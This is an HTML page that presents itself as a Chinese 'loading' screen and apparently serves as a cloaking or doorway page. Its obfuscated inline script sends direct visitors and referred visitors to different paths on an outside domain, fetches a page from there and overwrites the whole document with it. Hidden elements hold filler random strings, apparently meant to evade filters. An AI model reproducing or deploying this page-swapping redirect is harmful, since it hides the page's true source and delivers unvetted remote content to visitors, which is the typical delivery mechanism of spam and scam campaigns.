<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .osjowxfN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .osjowxfN .y3uL1aqYP {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .osjowxfN .content {
            line-height: 50px;
            text-align: center
        }

        .osjowxfN .img {
            width: 100%
        }

        .osjowxfN .JiXitb5 {
            text-align: center
        }

        .osjowxfN .JiXitb5 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .osjowxfN .JiXitb5 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .osjowxfN .JiXitb5 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .osjowxfN .JiXitb5 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .osjowxfN .JiXitb5 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .osjowxfN .JiXitb5 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .osjowxfN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function JgBGxZlJa(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var S7GZvh = JgBGxZlJa('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ S7GZvh +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ S7GZvh +".html?a=share";
		}
		
        ayljGf6i=url+"#"+new Date().getTime();
        ayljGf6i && function() {
            $.get(ayljGf6i, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >LUkCUhqvhhoqYAWgEnrBntXH6m2J</h1>
<h1 style='display:none' >LUkCUhqvhhoqYAWgEnrBntXH6m2J</h1>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>z0aIMUuSbHrau9GKyXlytXsSlPUeRzbF8X2Q</a>
<img  src='' style='display:none'><div class="osjowxfN">
    <div class="y3uL1aqYP">
        <div class="JiXitb5">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>c7x49JJZ2bQyHCxH6WFRMFzgVdNMTRZoyFFa3RN69eo1ZkIQbnaYK1P</span>
<ul style='display:none' >WdmVXUYbx0NNLvruF2i0rR5nknnuzc6N9lhKnvVlT2wh2fX4DY66zzopXLmw2RjqsdoOoZ76fF6L7Kjekb</ul>
<ul style='display:none' >WdmVXUYbx0NNLvruF2i0rR5nknnuzc6N9lhKnvVlT2wh2fX4DY66zzopXLmw2RjqsdoOoZ76fF6L7Kjekb</ul>
<li style='display:none' >vCLciTQ0Pc9QFsHZJ4yXG4TDABAf1xx</li>
<span style='display:none'>c7x49JJZ2bQyHCxH6WFRMFzgVdNMTRZoyFFa3RN69eo1ZkIQbnaYK1P</span>
<span style='display:none'>c7x49JJZ2bQyHCxH6WFRMFzgVdNMTRZoyFFa3RN69eo1ZkIQbnaYK1P</span></body>
</html>